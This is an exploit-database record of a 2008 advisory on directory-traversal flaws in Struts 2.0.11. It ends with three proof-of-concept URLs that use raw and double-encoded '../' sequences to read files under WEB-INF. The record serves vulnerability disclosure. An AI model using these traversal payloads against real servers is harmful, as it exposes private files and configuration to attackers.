Description
Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities
{"lastseen": "2020-04-01T19:04:49", "references": [], "description": "\nStruts 2.0.11 - Multiple Directory Traversal Vulnerabilities", "edition": 1, "reporter": "Csaba Barta", "exploitpack": {"type": "remote", "platform": "multiple"}, "published": "2008-11-04T00:00:00", "title": "Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-11-04T00:00:00", "id": "EXPLOITPACK:EFB617587CEAC46DB92EC29B27A07DDD", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/32104/info\n\nStruts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.\n\nAn attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.\n\nVersions prior to Struts 2.0.12 are vulnerable. \n\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts..\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f\nhttp://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\\in.class/", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645824872}}